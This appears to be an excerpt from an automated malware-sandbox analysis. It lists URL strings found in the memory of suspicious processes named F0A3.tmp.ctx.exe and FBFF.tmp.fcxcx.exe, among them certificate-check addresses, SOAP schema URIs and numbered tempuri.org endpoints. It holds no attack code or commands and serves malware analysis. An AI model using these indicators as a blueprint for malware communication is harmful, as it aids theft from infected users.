Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E3A000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E3D000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: explorer.exe, 00000014.00000000.2204496366.000000000305D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: F0A3.tmp.ctx.exe, 0000001F.00000003.2402065480.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2402307730.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2417458765.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2418005384.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2415590920.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401707697.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2420467057.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2419663756.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401529035.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 0000001F.00000003.2401908303.00000234A0E31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttp://www.inbox.l
Source: F0A3.tmp.ctx.exe, 00000027.00000002.2482728285.00007FF8209FD000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModelD
Source: explorer.exe, 00000014.00000000.2203972255.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.2214469056.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.2214505434.0000000007B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/:hardwares.
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.000000000334C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
